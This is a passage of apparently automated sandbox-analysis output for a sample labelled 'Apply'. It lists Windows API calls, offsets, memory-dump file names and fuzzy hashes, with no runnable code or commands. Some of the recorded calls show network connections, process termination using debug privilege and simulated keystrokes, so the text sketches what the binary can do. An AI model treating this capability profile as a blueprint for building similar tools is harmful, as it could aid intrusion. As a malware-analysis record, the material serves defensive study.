                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 008B282F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameParentSend
                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                    • API String ID: 1290815626-3381328864
                                                    • Opcode ID: 7c364307ed536a7466700ab113ff38835b4a531ed040fe74ddfb506af030a6c2
                                                    • Instruction ID: fd7e456b250e3a8d4d3b561979ce178dd1523a60a9a94f521ff13229d654a1b3
                                                    • Opcode Fuzzy Hash: 7c364307ed536a7466700ab113ff38835b4a531ed040fe74ddfb506af030a6c2
                                                    • Instruction Fuzzy Hash: C311297A78C30FB9FA1126249C06CEA379CFF19738B304136F905E41E1FF65A8504595
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                    • String ID:
                                                    • API String ID: 1282221369-0
                                                    • Opcode ID: fbfb7a117cf42adf8264fa799015be9b3681d345184ee7e843b09f6d7fec400a
                                                    • Instruction ID: e885ab10de4251ce28c0f023ac127ce68622c392d4506fc60bfad37b3adf367c
                                                    • Opcode Fuzzy Hash: fbfb7a117cf42adf8264fa799015be9b3681d345184ee7e843b09f6d7fec400a
                                                    • Instruction Fuzzy Hash: F361F671908315AFDF31BF78988166DBBA4FF12720F14416DE944E72C1EB31E9018792
                                                    APIs
                                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 008E5946
                                                    • ShowWindow.USER32(?,00000000), ref: 008E5987
                                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 008E598D
                                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 008E5991
                                                      • Part of subcall function 008E7685: DeleteObject.GDI32(00000000), ref: 008E76B1
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 008E59CD
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 008E59DA
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 008E5A0D
                                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 008E5A47
                                                    • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 008E5A56
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                    • String ID:
                                                    • API String ID: 3210457359-0
                                                    • Opcode ID: c412a866aad5ebcfb1ea127d54f4bf5ebc4cdf1fab27c73ec01ada9fbf11f4d2
                                                    • Instruction ID: 48dae2bbcbe472ae0f02a593cc5536e8ce3597d3594bfa217f9db88a4f5393e4
                                                    • Opcode Fuzzy Hash: c412a866aad5ebcfb1ea127d54f4bf5ebc4cdf1fab27c73ec01ada9fbf11f4d2
                                                    • Instruction Fuzzy Hash: 8551A430650A98FEEF30AF6ADC85BD83F65FB06328F144116F515DA2E2C7719A90DB81
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 008A6F36
                                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 008A6F4F
                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008A6F5F
                                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 008A6F77
                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008A6F98
                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00868E0E,00000000,00000000,00000000,000000FF,00000000), ref: 008A6FA7
                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 008A6FC4
                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00868E0E,00000000,00000000,00000000,000000FF,00000000), ref: 008A6FD3
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                    • String ID:
                                                    • API String ID: 1268354404-0
                                                    • Opcode ID: 7ad64a4ca1bdece41fdea92fd1bd6bb1017225bcd5cdb704e02f24be7b204b17
                                                    • Instruction ID: d86d814e9f13aeadba82073a6c12bc45468bb8db4971ba5550b6f8c5fc52d62e
                                                    • Opcode Fuzzy Hash: 7ad64a4ca1bdece41fdea92fd1bd6bb1017225bcd5cdb704e02f24be7b204b17
                                                    • Instruction Fuzzy Hash: 62516B70600209EFEB20DF24DC85FAA7BB5FB54714F144618F946DB6A0EB72E890DB50
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008CC8F1
                                                    • GetLastError.KERNEL32 ref: 008CC904
                                                    • SetEvent.KERNEL32(?), ref: 008CC918
                                                      • Part of subcall function 008CC9C2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008CC9E1
                                                      • Part of subcall function 008CC9C2: GetLastError.KERNEL32 ref: 008CCA91
                                                      • Part of subcall function 008CC9C2: SetEvent.KERNEL32(?), ref: 008CCAA5
                                                      • Part of subcall function 008CC9C2: InternetCloseHandle.WININET(00000000), ref: 008CCAB0
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                    • String ID:
                                                    • API String ID: 337547030-0
                                                    • Opcode ID: cf99f63fe77f48286a6d699d96d9abcfb1c926d8b37796a9ac5b82ebea149dce
                                                    • Instruction ID: bb5d8c623c0327085ebc36bd82c6e0512f0cc753c2668054626a2dc2a23231a4
                                                    • Opcode Fuzzy Hash: cf99f63fe77f48286a6d699d96d9abcfb1c926d8b37796a9ac5b82ebea149dce
                                                    • Instruction Fuzzy Hash: 8E314771200745BFDB219F65CC84F6ABFB9FF48304B14842EF95ACA610D731E818ABA1
                                                    APIs
                                                      • Part of subcall function 008B4128: GetWindowThreadProcessId.USER32(?,00000000), ref: 008B4142
                                                      • Part of subcall function 008B4128: GetCurrentThreadId.KERNEL32 ref: 008B4149
                                                      • Part of subcall function 008B4128: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008B2C95), ref: 008B4150
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 008B2C9F
                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008B2CBD
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 008B2CC1
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 008B2CCB
                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 008B2CE3
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 008B2CE7
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 008B2CF1
                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 008B2D05
                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 008B2D09
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                    • String ID:
                                                    • API String ID: 2014098862-0
                                                    • Opcode ID: 5427d26a129fcd9ab65c1898b0d525e7490166bb073bfc6f8c700ec6ce415b99
                                                    • Instruction ID: 3baa17e54c3664867d6b7f9cc4693dd3b8e6e102356ec17eae6fddd8b1343e66
                                                    • Opcode Fuzzy Hash: 5427d26a129fcd9ab65c1898b0d525e7490166bb073bfc6f8c700ec6ce415b99
                                                    • Instruction Fuzzy Hash: CC01D8307803147BFB2067689CCAF997F59FB5AB52F100001F718EE1E0C9E254488A6A
                                                    APIs
                                                      • Part of subcall function 008BDAC1: CreateToolhelp32Snapshot.KERNEL32 ref: 008BDAE6
                                                      • Part of subcall function 008BDAC1: Process32FirstW.KERNEL32(00000000,?), ref: 008BDAF4
                                                      • Part of subcall function 008BDAC1: FindCloseChangeNotification.KERNEL32(00000000), ref: 008BDBC1
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008DA8F4
                                                    • GetLastError.KERNEL32 ref: 008DA907
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008DA93A
                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 008DA9EF
                                                    • GetLastError.KERNEL32(00000000), ref: 008DA9FA
                                                    • CloseHandle.KERNEL32(00000000), ref: 008DAA4B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                                    • String ID: SeDebugPrivilege
                                                    • API String ID: 1701285019-2896544425
                                                    • Opcode ID: 22839a2e0bc12708bef1cfa95f64469d9da69aade0bf5e28086ba637541c96bb
                                                    • Instruction ID: c8a688517a1c2113e2b4e3c7c1385e07f33932df01d5134da0b3f1f57c200e2d
                                                    • Opcode Fuzzy Hash: 22839a2e0bc12708bef1cfa95f64469d9da69aade0bf5e28086ba637541c96bb
                                                    • Instruction Fuzzy Hash: FE619D31204341AFD724DF18C494F16BBA0FF44318F28859DE8668B792D775ED8ACB92
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 008E40E3
                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 008E40F8
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 008E4112
                                                    • _wcslen.LIBCMT ref: 008E4157
                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 008E4184
                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 008E41B2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window_wcslen
                                                    • String ID: SysListView32
                                                    • API String ID: 2147712094-78025650
                                                    • Opcode ID: b2579a3f453e552b7ee6234643a33b551c83d2ab0a35ff7a8347753b37c6320a
                                                    • Instruction ID: 11fd8b778e06420b9d3f854ae16216cf03d41dade8ed0742ebaa6bc8457c03dc
                                                    • Opcode Fuzzy Hash: b2579a3f453e552b7ee6234643a33b551c83d2ab0a35ff7a8347753b37c6320a
                                                    • Instruction Fuzzy Hash: 6941D071A00358ABDF219FA4CC89BEA7BA9FF58350F101526F918EB281D771D994CB90
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008BC3FE
                                                    • IsMenu.USER32(00000000), ref: 008BC41E
                                                    • CreatePopupMenu.USER32 ref: 008BC454
                                                    • GetMenuItemCount.USER32(01589310), ref: 008BC4A5
                                                    • InsertMenuItemW.USER32(01589310,?,00000001,00000030), ref: 008BC4CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                    • String ID: 0$2
                                                    • API String ID: 93392585-3793063076
                                                    • Opcode ID: 2f0cb87bc75886c3dcc23e1406b70cec3d7e619b82495c109ce70b78d4e0f113
                                                    • Instruction ID: 426f4e97a2520e467422ea2809b51accce204fe1c0c92bb8b015aec3e115f20f
                                                    • Opcode Fuzzy Hash: 2f0cb87bc75886c3dcc23e1406b70cec3d7e619b82495c109ce70b78d4e0f113
                                                    • Instruction Fuzzy Hash: 29518D706002059BDB20CFA8D994BFEBBF4FF45314F148159E815EB391D7709A45CB65
                                                    APIs
                                                    • LoadIconW.USER32(00000000,00007F03), ref: 008BCEF8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: IconLoad
                                                    • String ID: blank$info$question$stop$warning
                                                    • API String ID: 2457776203-404129466
                                                    • Opcode ID: 30dde1e4d616ea9fe1b00ceb35ab813fb9f3db8c1c623fc0de5dd2f90bd6ede9
                                                    • Instruction ID: 8c70159bf5bb937883cdd767c2867be2c01fd5d231dc02d26ea789d44faf43ad
                                                    • Opcode Fuzzy Hash: 30dde1e4d616ea9fe1b00ceb35ab813fb9f3db8c1c623fc0de5dd2f90bd6ede9
                                                    • Instruction Fuzzy Hash: E111903124C74BBAA7125B94DC82DFF67ACFF05364B60406AF504E63C2EBB0E9404565
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                    • String ID: 0.0.0.0
                                                    • API String ID: 642191829-3771769585
                                                    • Opcode ID: 54d69ed0a5dbe09475060d8ac3470081cbfce5da05dcd57610bb0be5ecbe82f7
                                                    • Instruction ID: 2c0fe0522c81951d7835d1cda64c7621cb021dec977ba68fe053e226ad0a3663
                                                    • Opcode Fuzzy Hash: 54d69ed0a5dbe09475060d8ac3470081cbfce5da05dcd57610bb0be5ecbe82f7
                                                    • Instruction Fuzzy Hash: FF110331904218AFCB30AB74DC4AEEE77BCFF41714F0001A5F149DA192EF71DA858A62
                                                    APIs
                                                      • Part of subcall function 00869DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00869DE2
                                                    • GetSystemMetrics.USER32(0000000F), ref: 008EA6B3
                                                    • GetSystemMetrics.USER32(0000000F), ref: 008EA6D3
                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 008EA910
                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 008EA92E
                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 008EA94F
                                                    • ShowWindow.USER32(00000003,00000000), ref: 008EA96E
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 008EA993
                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 008EA9B6
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                    • String ID:
                                                    • API String ID: 1211466189-0
                                                    • Opcode ID: c0cb0579383e9efe795262ab2eff9d60288e31b7f84b876d60ba2c077e01d4d3
                                                    • Instruction ID: 97484ccef424f736bc2fc5009d044b0756e38ffdb53607c671a015f9771f7518
                                                    • Opcode Fuzzy Hash: c0cb0579383e9efe795262ab2eff9d60288e31b7f84b876d60ba2c077e01d4d3
                                                    • Instruction Fuzzy Hash: A8B19B35600259EFDF18CF2AC9C47AA7BB2FF45B00F098069EC95DE296D730A945CB61
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$LocalTime
                                                    • String ID:
                                                    • API String ID: 952045576-0
                                                    • Opcode ID: 91fcdf6ee24ecfc2ee80f5eed244ebeef4275e3fd14f64e61320359001749f6e
                                                    • Instruction ID: 226135f3f47fe9e13930d045784732c6e2831b218e7660fc0b0214ffc8979b85
                                                    • Opcode Fuzzy Hash: 91fcdf6ee24ecfc2ee80f5eed244ebeef4275e3fd14f64e61320359001749f6e
                                                    • Instruction Fuzzy Hash: 6F4130A6C1161876CB11ABE88C469CFB7B8FF15310F50C466E61CE3226FB34D655C3AA
                                                    APIs
                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00892A40,00000004,00000000,00000000), ref: 0086F611
                                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00892A40,00000004,00000000,00000000), ref: 008AF980
                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00892A40,00000004,00000000,00000000), ref: 008AFA03
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ShowWindow
                                                    • String ID:
                                                    • API String ID: 1268545403-0
                                                    • Opcode ID: 307ff55a0df6b76d25afa4aec225b0cc48a198ed7f32a2071f0a7cb24c10d5b8
                                                    • Instruction ID: ae598248dd33a8f649d2216154c621f0ced6378916f1f98689e1a16400831670
                                                    • Opcode Fuzzy Hash: 307ff55a0df6b76d25afa4aec225b0cc48a198ed7f32a2071f0a7cb24c10d5b8
                                                    • Instruction Fuzzy Hash: B941F670608380AAD7359B39E989B6A7F92FF66314F1A443CE247C6977C631E884DB11
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 008A6F36
                                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 008A6F4F
                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008A6F5F
                                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 008A6F77
                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008A6F98
                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00868E0E,00000000,00000000,00000000,000000FF,00000000), ref: 008A6FA7
                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 008A6FC4
                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00868E0E,00000000,00000000,00000000,000000FF,00000000), ref: 008A6FD3
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                    • String ID:
                                                    • API String ID: 1268354404-0
                                                    • Opcode ID: 6d91de33cede4fbda3a9e03aa1852c7613c034e55bbe0b23a44b7400d5335c27
                                                    • Instruction ID: c50fa281b4bdf9d291575665e3ce82fa3c4ea11fc470f7875363a5b6b51a4f85
                                                    • Opcode Fuzzy Hash: 6d91de33cede4fbda3a9e03aa1852c7613c034e55bbe0b23a44b7400d5335c27
                                                    • Instruction Fuzzy Hash: 9441AD30600345AFEB21CF24DC85BAA7BB4FB46710F080659FA95DB6E0EB72E954DB50
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 008E34D9
                                                    • GetDC.USER32(00000000), ref: 008E34E1
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008E34EC
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 008E34F8
                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 008E3534
                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 008E3545
